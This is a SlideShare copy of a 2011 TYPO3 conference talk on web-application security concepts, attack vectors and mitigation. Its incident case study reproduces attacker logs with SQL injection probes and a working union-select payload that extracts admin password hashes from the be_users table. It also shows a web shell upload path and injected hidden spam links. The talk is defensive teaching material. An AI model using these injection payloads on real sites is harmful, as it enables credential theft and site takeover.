TYPO3 Conference - San Francisco 2011   InspiringTYPO Security - Risks and Mitigation    sha
T3CON11 San Francisco     TYPO Security - Risks and Mitigation                    10.06.2011Helmut Hummel <helmut.hummel@t...
IntroductionAbout me   Involved in TYPO3 project since 2005   Member of the TYPO3 Security Team since 2008   TYPO3 Securit...
TYPO Security - Risks and MitigationAgenda   What is Security?   General Security Concepts   Attack Vectors   Knowing the ...
What is Security?                                       Inspiring people toTYPO Security - Risks and Mitigation   share
Is TYPO3 secure? Is my TYPO3 Site secure?                                       Inspiring people toTYPO Security - Risks a...
What is Security?Criteria for Security                                       Inspiring people toTYPO Security - Risks and ...
What is Security?Criteria for Security   Privacy                                       Inspiring people toTYPO Security - ...
What is Security?Criteria for Security   Privacy   Integrity and Property                                       Inspiring ...
What is Security?Criteria for Security   Privacy   Integrity and Property   Availability and Intentional Use              ...
Security is a process, not         a product.     (Bruce Schneier)                                       Inspiring people ...
What is Security?Security is a process                                       Inspiring people toTYPO Security - Risks and ...
What is Security?Security is a process   Care taking and improvements over time                                       Insp...
What is Security?Security is a process   Care taking and improvements over time   Depending on your needs                 ...
What is Security?Security is a process   Care taking and improvements over time   Depending on your needs   Nothing is sec...
What is Security?Why TYPO3 can be considered to be notinsecure                                       Inspiring people toTY...
What is Security?Why TYPO3 can be considered to be notinsecure   TYPO3 Security Team takes care                           ...
What is Security?Why TYPO3 can be considered to be notinsecure   TYPO3 Security Team takes care   Highly customizable for ...
What is Security?Why TYPO3 can be considered to be notinsecure   TYPO3 Security Team takes care   Highly customizable for ...
General Security Concepts                                       Inspiring people toTYPO Security - Risks and Mitigation   ...
General Security ConceptsGeneral Security Concepts                                       Inspiring people toTYPO Security ...
General Security ConceptsGeneral Security Concepts   Defense in depth                                       Inspiring peop...
General Security ConceptsGeneral Security Concepts   Defense in depth   Minimize Exposure / Least privilege               ...
General Security ConceptsGeneral Security Concepts   Defense in depth   Minimize Exposure / Least privilege               ...
General Security ConceptsGeneral Security Concepts   Defense in depth   Minimize Exposure / Least privilege   Do not rely ...
General Security ConceptsGeneral Security Concepts   Defense in depth   Minimize Exposure / Least privilege   Do not rely ...
Attack Vectors                                       Inspiring people toTYPO Security - Risks and Mitigation   share
Attack VectorsAttack Vectors                                       Inspiring people toTYPO Security - Risks and Mitigation...
Attack VectorsAttack Vectors   Security Issues in outdated TYPO3 Versions                                         Inspirin...
Attack VectorsAttack Vectors   Security Issues in outdated TYPO3 Versions   Security Issues in (outdated) TYPO3 Extensions...
Attack VectorsAttack Vectors   Security Issues in outdated TYPO3 Versions   Security Issues in (outdated) TYPO3 Extensions...
Attack VectorsAttack Vectors   Security Issues in outdated TYPO3 Versions   Security Issues in (outdated) TYPO3 Extensions...
Attack VectorsAttack Vectors   Security Issues in outdated TYPO3 Versions   Security Issues in (outdated) TYPO3 Extensions...
Attack VectorsAttack Vectors   Security Issues in outdated TYPO3 Versions   Security Issues in (outdated) TYPO3 Extensions...
Knowing the Enemy                                       Inspiring people toTYPO Security - Risks and Mitigation   share
Knowing the EnemyThe incident, how did it happen?        <div style="display:none;"><a href="http://totiyaso.tripod.com/jo...
Knowing the EnemySearching for vulnerabilities178.122.0.0 - - [17/Dec/2010:14:01:43 +0100]"GET http://www.example.com/glos...
Knowing the EnemySearching for vulnerabilities178.122.0.0 - - [17/Dec/2010:14:02:30 +0100]"GET http://www.example.com/glos...
Knowing the EnemySearching for vulnerabilities14:03:09: tx_galleryexample_pi2[uid]=1192&tx_galleryexample_pi2[year]=2010  ...
Knowing the EnemySearching for vulnerabilities14:03:21: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010   ...
Knowing the EnemySearching for vulnerabilities14:03:42: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010   ...
Knowing the EnemySearching for vulnerabilities14:04:15: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010 --...
Knowing the EnemyFound something!14:04:38: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010order by 10 --  ...
Knowing the EnemyForging the exploit14:08:38: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010union select ...
Knowing the EnemyExploit working!14:09:04: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=-2010union select1,2...
Knowing the Enemy15 minutes later: Log in asadmin!14:21:48: /typo3/index.php14:21:50: /typo3/backend.php                  ...
Knowing the EnemyUploading web shell14:22:32: /typo3conf/ext/t3quixplorer/mod1/index.php?action=upload&dir=/typo3conf/ext/...
Knowing the EnemyConclusion                                       Inspiring people toTYPO Security - Risks and Mitigation ...
Knowing the EnemyConclusion   Hackers know what they are doing                                       Inspiring people toTY...
Knowing the EnemyConclusion   Hackers know what they are doing   They know TYPO3 very well                                ...
Knowing the EnemyConclusion   Hackers know what they are doing   They know TYPO3 very well   They also use automated tools...
Knowing the EnemyConclusion   Hackers know what they are doing   They know TYPO3 very well   They also use automated tools...
Knowing the EnemyConclusion   Hackers know what they are doing   They know TYPO3 very well   They also use automated tools...
Mitigation                                       Inspiring people toTYPO Security - Risks and Mitigation   share
MitiationMandatory steps                                       Inspiring people toTYPO Security - Risks and Mitigation   s...
MitiationMandatory steps   Monitor and Back Up your Website                                       Inspiring people toTYPO ...
MitiationMandatory steps   Monitor and Back Up your Website   Read the announce Mailing list and bulletins   carefully    ...
MitiationMandatory steps   Monitor and Back Up your Website   Read the announce Mailing list and bulletins   carefully   U...
MitiationMandatory steps   Monitor and Back Up your Website   Read the announce Mailing list and bulletins   carefully   U...
MitiationMandatory steps   Monitor and Back Up your Website   Read the announce Mailing list and bulletins   carefully   U...
MitiationAdvanced steps                                       Inspiring people toTYPO Security - Risks and Mitigation   sh...
MitiationAdvanced steps   Use TYPO3 Core features in favour of extensions                                         Inspirin...
MitiationAdvanced steps   Use TYPO3 Core features in favour of extensions   Use protected backend access                  ...
MitiationAdvanced steps   Use TYPO3 Core features in favour of extensions   Use protected backend access   Consider using ...
MitiationAdvanced steps   Use TYPO3 Core features in favour of extensions   Use protected backend access   Consider using ...
TYPO3 Security Team                                       Inspiring people toTYPO Security - Risks and Mitigation   share
TYPO3 Security TeamImportant things to know                                       Inspiring people toTYPO Security - Risks...
TYPO3 Security TeamImportant things to know   Responsible Disclosure Policy                                       Inspirin...
TYPO3 Security TeamImportant things to know   Responsible Disclosure Policy   One communication channel (security@typo3.or...
TYPO3 Security TeamImportant things to know   Responsible Disclosure Policy   One communication channel (security@typo3.or...
TYPO3 Security TeamImportant things to know   Responsible Disclosure Policy   One communication channel (security@typo3.or...
TYPO Security - Risks and MitigationRescources   PHP-Sicherheit (Christopher Kunz and Stefan   Esser)   Essential PHP Secu...
Questions?                                       Inspiring people toTYPO Security - Risks and Mitigation   share
Thank You!                                       Inspiring people toTYPO Security - Risks and Mitigation   share
inspiring people to share.
TYPO3 Security - Risks and Mitigation
Upcoming SlideShare
Loading in...5
×

TYPO3 Security - Risks and Mitigation

975

Published on

Published in: Technology, Business
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
975
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
2
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide
  • 1\n2\n3\n4\n5\n6\n7\n
  • \n
  • \n
  • Interrupt me immediatly if you have questions\n
  • Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\nWhy it is important to define?\n\n\n
  • It depends ;)\n\n
  • Private things are kept private\n* Walking in the house being naked\n* Customer data not exposed\nNothing can be stolen\n* Your TV is still there whe you return home and it is still working\n* Bank Accounts, Vouchers etc.\nNobody can use your &amp;#x201E;subject&amp;#x201C; for any other purpose than the one you intented\n* Nobody sleeps in your bed, uses your Internet Connections for commiting crime etc.\n* Website is running and does not display SPAM links on your website\n
  • Private things are kept private\n* Walking in the house being naked\n* Customer data not exposed\nNothing can be stolen\n* Your TV is still there whe you return home and it is still working\n* Bank Accounts, Vouchers etc.\nNobody can use your &amp;#x201E;subject&amp;#x201C; for any other purpose than the one you intented\n* Nobody sleeps in your bed, uses your Internet Connections for commiting crime etc.\n* Website is running and does not display SPAM links on your website\n
  • Private things are kept private\n* Walking in the house being naked\n* Customer data not exposed\nNothing can be stolen\n* Your TV is still there whe you return home and it is still working\n* Bank Accounts, Vouchers etc.\nNobody can use your &amp;#x201E;subject&amp;#x201C; for any other purpose than the one you intented\n* Nobody sleeps in your bed, uses your Internet Connections for commiting crime etc.\n* Website is running and does not display SPAM links on your website\n
  • \n
  • Caretaking: \n* Replace broken, not working locks, don&amp;#x2018;t use simple 3-number locks, even not for your oldest bike\n* As hackers and hacker tools and computing power evolve, so the security concepts have to\n* Established Security handling workflow\n\nYour needs:\n* Do you live in a small village in canada or in New York (special bike-lock)\n* Are you a Bank or just showing your gold fish breed on a website?\n* The security efforts must relate to the possible impact:\n* invest in resources taken for security / potential loss when hacked\n-&gt;If the effort to be hacked exceeds the gain\n Your system is secure\nNothing is secure by definition:\n* The security of an application must be proven over time\n\n\n
  • Caretaking: \n* Replace broken, not working locks, don&amp;#x2018;t use simple 3-number locks, even not for your oldest bike\n* As hackers and hacker tools and computing power evolve, so the security concepts have to\n* Established Security handling workflow\n\nYour needs:\n* Do you live in a small village in canada or in New York (special bike-lock)\n* Are you a Bank or just showing your gold fish breed on a website?\n* The security efforts must relate to the possible impact:\n* invest in resources taken for security / potential loss when hacked\n-&gt;If the effort to be hacked exceeds the gain\n Your system is secure\nNothing is secure by definition:\n* The security of an application must be proven over time\n\n\n
  • Caretaking: \n* Replace broken, not working locks, don&amp;#x2018;t use simple 3-number locks, even not for your oldest bike\n* As hackers and hacker tools and computing power evolve, so the security concepts have to\n* Established Security handling workflow\n\nYour needs:\n* Do you live in a small village in canada or in New York (special bike-lock)\n* Are you a Bank or just showing your gold fish breed on a website?\n* The security efforts must relate to the possible impact:\n* invest in resources taken for security / potential loss when hacked\n-&gt;If the effort to be hacked exceeds the gain\n Your system is secure\nNothing is secure by definition:\n* The security of an application must be proven over time\n\n\n
  • Caretaking: \n* All issues handled by the Sec-Team. No 0-Day exploits so far, everything (core) has been reported beforehand to us\n* New Security features are beeing implemented (saltedpasswords, rsaauth)\n\nYour needs:\n* TYPO3 is highly customizable (login services, plugins etc.) \n* e.g. Health information platform: encrypted webservice data (password hash is key)\n\nFew critical Security issues over time\n* Handled fast and relyable by the sec team\n\n\n
  • Caretaking: \n* All issues handled by the Sec-Team. No 0-Day exploits so far, everything (core) has been reported beforehand to us\n* New Security features are beeing implemented (saltedpasswords, rsaauth)\n\nYour needs:\n* TYPO3 is highly customizable (login services, plugins etc.) \n* e.g. Health information platform: encrypted webservice data (password hash is key)\n\nFew critical Security issues over time\n* Handled fast and relyable by the sec team\n\n\n
  • Caretaking: \n* All issues handled by the Sec-Team. No 0-Day exploits so far, everything (core) has been reported beforehand to us\n* New Security features are beeing implemented (saltedpasswords, rsaauth)\n\nYour needs:\n* TYPO3 is highly customizable (login services, plugins etc.) \n* e.g. Health information platform: encrypted webservice data (password hash is key)\n\nFew critical Security issues over time\n* Handled fast and relyable by the sec team\n\n\n
  • Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
  • Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &amp;#x201E;secret&amp;#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
  • Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &amp;#x201E;secret&amp;#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
  • Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &amp;#x201E;secret&amp;#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
  • Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &amp;#x201E;secret&amp;#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
  • Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &amp;#x201E;secret&amp;#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven &amp;#x201E;small websites&amp;#x201C; are targeted\n
  • Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven &amp;#x201E;small websites&amp;#x201C; are targeted\n
  • Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven &amp;#x201E;small websites&amp;#x201C; are targeted\n
  • Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven &amp;#x201E;small websites&amp;#x201C; are targeted\n
  • Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven &amp;#x201E;small websites&amp;#x201C; are targeted\n
  • Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
  • Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
  • Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
  • Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
  • Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
  • Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
  • Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
  • TYPO3 Core features\n* much better maintained and better codebase\n\nProtected backend\n* NO FTP!, SSL, protect with http auth (only certain IPs)\n\n
  • TYPO3 Core features\n* much better maintained and better codebase\n\nProtected backend\n* NO FTP!, SSL, protect with http auth (only certain IPs)\n\n
  • TYPO3 Core features\n* much better maintained and better codebase\n\nProtected backend\n* NO FTP!, SSL, protect with http auth (only certain IPs)\n\n
  • TYPO3 Core features\n* much better maintained and better codebase\n\nProtected backend\n* NO FTP!, SSL, protect with http auth (only certain IPs)\n\n
  • Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
  • RD:\n* Publish issue with a fix (may take some time)\nCommunication:\n* everything you suspect to be sec-related, let us know!\nPre-Announcement:\n* If no pre-announcement is made, issue is not critical\n* We try to release in the first half of the week (mostly Tuesday)\nSupport:\n* Good Reports\n* Send friendly reminders\n* \n* Donate money\n
  • RD:\n* Publish issue with a fix (may take some time)\nCommunication:\n* everything you suspect to be sec-related, let us know!\nPre-Announcement:\n* If no pre-announcement is made, issue is not critical\n* We try to release in the first half of the week (mostly Tuesday)\nSupport:\n* Good Reports\n* Send friendly reminders\n* \n* Donate money\n
  • RD:\n* Publish issue with a fix (may take some time)\nCommunication:\n* everything you suspect to be sec-related, let us know!\nPre-Announcement:\n* If no pre-announcement is made, issue is not critical\n* We try to release in the first half of the week (mostly Tuesday)\nSupport:\n* Good Reports\n* Send friendly reminders\n* \n* Donate money\n
  • RD:\n* Publish issue with a fix (may take some time)\nCommunication:\n* everything you suspect to be sec-related, let us know!\nPre-Announcement:\n* If no pre-announcement is made, issue is not critical\n* We try to release in the first half of the week (mostly Tuesday)\nSupport:\n* Good Reports\n* Send friendly reminders\n* \n* Donate money\n
  • \n
  • Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
  • Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
  • \n
  • Transcript of "TYPO3 Security - Risks and Mitigation"

    1. 1. TYPO3 Conference - San Francisco 2011 InspiringTYPO Security - Risks and Mitigation sha
    2. 2. T3CON11 San Francisco TYPO Security - Risks and Mitigation 10.06.2011Helmut Hummel <helmut.hummel@typo3.org>
    3. 3. IntroductionAbout me Involved in TYPO3 project since 2005 Member of the TYPO3 Security Team since 2008 TYPO3 Security Team Leader since 2009 TYPO3 Core Team Member since 2011 Employed at naw.info in Hannover, Germany Twitter: helhum Blog: http://www.naw.info/blogs/typo3security/ Inspiring people toTYPO Security - Risks and Mitigation share
    4. 4. TYPO Security - Risks and MitigationAgenda What is Security? General Security Concepts Attack Vectors Knowing the Enemy: A Case Story Mitigation TYPO3 Security Team Inspiring people toTYPO Security - Risks and Mitigation share
    5. 5. What is Security? Inspiring people toTYPO Security - Risks and Mitigation share
    6. 6. Is TYPO3 secure? Is my TYPO3 Site secure? Inspiring people toTYPO Security - Risks and Mitigation share
    7. 7. What is Security?Criteria for Security Inspiring people toTYPO Security - Risks and Mitigation share
    8. 8. What is Security?Criteria for Security Privacy Inspiring people toTYPO Security - Risks and Mitigation share
    9. 9. What is Security?Criteria for Security Privacy Integrity and Property Inspiring people toTYPO Security - Risks and Mitigation share
    10. 10. What is Security?Criteria for Security Privacy Integrity and Property Availability and Intentional Use Inspiring people toTYPO Security - Risks and Mitigation share
    11. 11. Security is a process, not a product. (Bruce Schneier) Inspiring people toTYPO Security - Risks and Mitigation share
    12. 12. What is Security?Security is a process Inspiring people toTYPO Security - Risks and Mitigation share
    13. 13. What is Security?Security is a process Care taking and improvements over time Inspiring people toTYPO Security - Risks and Mitigation share
    14. 14. What is Security?Security is a process Care taking and improvements over time Depending on your needs Inspiring people toTYPO Security - Risks and Mitigation share
    15. 15. What is Security?Security is a process Care taking and improvements over time Depending on your needs Nothing is secure! Something can only be not insecure at a particular time Inspiring people toTYPO Security - Risks and Mitigation share
    16. 16. What is Security?Why TYPO3 can be considered to be notinsecure Inspiring people toTYPO Security - Risks and Mitigation share
    17. 17. What is Security?Why TYPO3 can be considered to be notinsecure TYPO3 Security Team takes care Inspiring people toTYPO Security - Risks and Mitigation share
    18. 18. What is Security?Why TYPO3 can be considered to be notinsecure TYPO3 Security Team takes care Highly customizable for your needs Inspiring people toTYPO Security - Risks and Mitigation share
    19. 19. What is Security?Why TYPO3 can be considered to be notinsecure TYPO3 Security Team takes care Highly customizable for your needs Few critical Security issues over time Inspiring people toTYPO Security - Risks and Mitigation share
    20. 20. General Security Concepts Inspiring people toTYPO Security - Risks and Mitigation share
    21. 21. General Security ConceptsGeneral Security Concepts Inspiring people toTYPO Security - Risks and Mitigation share
    22. 22. General Security ConceptsGeneral Security Concepts Defense in depth Inspiring people toTYPO Security - Risks and Mitigation share
    23. 23. General Security ConceptsGeneral Security Concepts Defense in depth Minimize Exposure / Least privilege Inspiring people toTYPO Security - Risks and Mitigation share
    24. 24. General Security ConceptsGeneral Security Concepts Defense in depth Minimize Exposure / Least privilege Inspiring people toTYPO Security - Risks and Mitigation share
    25. 25. General Security ConceptsGeneral Security Concepts Defense in depth Minimize Exposure / Least privilege Do not rely on security by obscurity Inspiring people toTYPO Security - Risks and Mitigation share
    26. 26. General Security ConceptsGeneral Security Concepts Defense in depth Minimize Exposure / Least privilege Do not rely on security by obscurity Log Activities Inspiring people toTYPO Security - Risks and Mitigation share
    27. 27. Attack Vectors Inspiring people toTYPO Security - Risks and Mitigation share
    28. 28. Attack VectorsAttack Vectors Inspiring people toTYPO Security - Risks and Mitigation share
    29. 29. Attack VectorsAttack Vectors Security Issues in outdated TYPO3 Versions Inspiring people toTYPO Security - Risks and Mitigation share
    30. 30. Attack VectorsAttack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Inspiring people toTYPO Security - Risks and Mitigation share
    31. 31. Attack VectorsAttack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Inspiring people toTYPO Security - Risks and Mitigation share
    32. 32. Attack VectorsAttack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Simple paswords Inspiring people toTYPO Security - Risks and Mitigation share
    33. 33. Attack VectorsAttack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Simple paswords Compromised PC with FTP access Inspiring people toTYPO Security - Risks and Mitigation share
    34. 34. Attack VectorsAttack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Simple paswords Compromised PC with FTP access Other Software on the webserver Inspiring people toTYPO Security - Risks and Mitigation share
    35. 35. Knowing the Enemy Inspiring people toTYPO Security - Risks and Mitigation share
    36. 36. Knowing the EnemyThe incident, how did it happen? <div style="display:none;"><a href="http://totiyaso.tripod.com/jovian-v251-for-palmos- crack.html">Jovian v2.5.1 for PalmOS Crack</a> <a href="http://tarajoz.tripod.com/clickomania-21-for- palmos-crack.html">Clickomania 2.1 for PalmOS Crack</a> <a href="http://mujaciya.tripod.com/ ollydbg-110-xp-crack.html">OllyDbg 1.10 XP Crack</a> <a href="http://loyobusi.tripod.com/infograph- infocad-v651b-crack.html">InfoGraph InfoCAD v6.51b Crack</a> <a href="http://nisexufo.tripod.com/ customizer-xp-v15-by-tnt-crack.html">Customizer XP v1.5 by TNT Crack</a> <a href="http:// yajegoco.tripod.com/gw3dfeatures-for-solidworks-v5-crack.html">GW3Dfeatures For SolidWorks v5 Crack</ a> <a href="http://lebuvoxo.tripod.com/regrun-ii-v291-crack.html">RegRun II v2.91 Crack</a> <a href="http://ziziquy.tripod.com/stuffit-standard-v852165-crack.html">StuffIt Standard v8.5.2.165 Crack</a> <a href="http://ziziquy.tripod.com/glu3d-v1308-for-3dsmax-7-crack.html">Glu3D v1.3.08 for 3dsmax 7 Crack</a> <a href="http://yucayibu.tripod.com/cpukiller-v20-serial-by-tnt- crack.html">CPUKILLER v2.0 Serial by TNT Crack</a> <a href="http://fimegipo.tripod.com/microangelo- v55-by-aaocg-crack.html">Microangelo v5.5 by AAOCG Crack</a> <a href="http://loyobusi.tripod.com/ restoreit-deluxe-edition-v301-crack.html">RestoreIT! Deluxe Edition v3.01 Crack</a> <a href="http:// tomuxeq.tripod.com/abbyy-scanto-office-v10-crack.html">ABBYY ScanTo Office v1.0 Crack</a> <a href="http://besiluho.tripod.com/anno-domini-2002-v106-build-1-crack.html">Anno Domini 2002 v1.06 build 1 Crack</a> <a href="http://yepimal.tripod.com/serious-sam-2-plus-5-trainer-crack.html">SERIOUS SAM 2 PLUS 5 TRAINER Crack</a> <a href="http://vihuseya.tripod.com/pe-corrector-v166-by-fff- crack.html">PE Corrector v1.66 by FFF Crack</a> <a href="http://tarajoz.tripod.com/teenswebbrowser- bounce-10-crack.html">teensWebBrowser Bounce 1.0 Crack</a> <a href="http://loyobusi.tripod.com/bb- password-manager-v1011-crack.html">BB Password Manager v1.0.1.1 Crack</a> <a href="http:// reyabade.tripod.com/calendar-wizard-v2014a-crack.html">Calendar Wizard v2.0.14a Crack</a> <a href="http://gezuvak.tripod.com/1-act-personal-firewall-2006-crack.html">1-ACT Personal Firewall 2006 Crack</a> <a href="http://fimegipo.tripod.com/system-locker-112f-by-dbc-crack.html">System Locker 1.12f by DBC Crack</a> <a href="http://sehuxogo.tripod.com/nidesoft-dvd-ripper-v3062- crack.html">Nidesoft DVD Ripper v3.0.62 Crack</a> <a href="http://ziziquy.tripod.com/clonecd-v4331-by- tsrh-crack.html">CloneCD v4.3.3.1 by TSRH Crack</a> <a href="http://tihuqap.tripod.com/icon-sucker-2- pro-210072-crack.html">Icon Sucker 2 Pro 2.10.072 Crack</a> <a href="http://coqoxole.tripod.com/ primasoft-internet-optimizer-crack.html">PrimaSoft Internet Optimizer Crack</a> <a href="http:// fimegipo.tripod.com/fairstars-recorder-v201-crack.html">FairStars Recorder v2.01 Crack</a> <a href="http://nekuqoj.tripod.com/email-validation-for-net-v20crack.html">Email Validation for NET v2.0Crack</a> <a href="http://xocedeqi.tripod.com/mathworks-matlab-r2006b-3-cds-crack.html">Mathworks Matlab R2006b (3 cds) Crack</a> <a Inspiring people toTYPO Security - Risks and Mitigation share
    37. 37. Knowing the EnemySearching for vulnerabilities178.122.0.0 - - [17/Dec/2010:14:01:43 +0100]"GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93 HTTP/1.1" 20054383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63" Inspiring people toTYPO Security - Risks and Mitigation share
    38. 38. Knowing the EnemySearching for vulnerabilities178.122.0.0 - - [17/Dec/2010:14:02:30 +0100]"GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+--+ HTTP/1.1" 20054383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63" Inspiring people toTYPO Security - Risks and Mitigation share
    39. 39. Knowing the EnemySearching for vulnerabilities14:03:09: tx_galleryexample_pi2[uid]=1192&tx_galleryexample_pi2[year]=2010 Inspiring people toTYPO Security - Risks and Mitigation share
    40. 40. Knowing the EnemySearching for vulnerabilities14:03:21: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010 Inspiring people toTYPO Security - Risks and Mitigation share
    41. 41. Knowing the EnemySearching for vulnerabilities14:03:42: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010 Inspiring people toTYPO Security - Risks and Mitigation share
    42. 42. Knowing the EnemySearching for vulnerabilities14:04:15: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010 -- Inspiring people toTYPO Security - Risks and Mitigation share
    43. 43. Knowing the EnemyFound something!14:04:38: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010order by 10 -- Inspiring people toTYPO Security - Risks and Mitigation share
    44. 44. Knowing the EnemyForging the exploit14:08:38: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=2010union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 -- Inspiring people toTYPO Security - Risks and Mitigation share
    45. 45. Knowing the EnemyExploit working!14:09:04: tx_galleryexample_pi2[uid]=979&tx_galleryexample_pi2[year]=-2010union select1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,group_concat(concat_ws(0x3a3a,username,password,admin)),20,21,22 from be_users where admin=1 --Now the hacker has the md5 hashes ofall admin passwords Inspiring people toTYPO Security - Risks and Mitigation share
    46. 46. Knowing the Enemy15 minutes later: Log in asadmin!14:21:48: /typo3/index.php14:21:50: /typo3/backend.php Inspiring people toTYPO Security - Risks and Mitigation share
    47. 47. Knowing the EnemyUploading web shell14:22:32: /typo3conf/ext/t3quixplorer/mod1/index.php?action=upload&dir=/typo3conf/ext/realurlmanagement/14:22:46: /typo3conf/ext/realurlmanagement/title.phpYou loose! Inspiring people toTYPO Security - Risks and Mitigation share
    48. 48. Knowing the EnemyConclusion Inspiring people toTYPO Security - Risks and Mitigation share
    49. 49. Knowing the EnemyConclusion Hackers know what they are doing Inspiring people toTYPO Security - Risks and Mitigation share
    50. 50. Knowing the EnemyConclusion Hackers know what they are doing They know TYPO3 very well Inspiring people toTYPO Security - Risks and Mitigation share
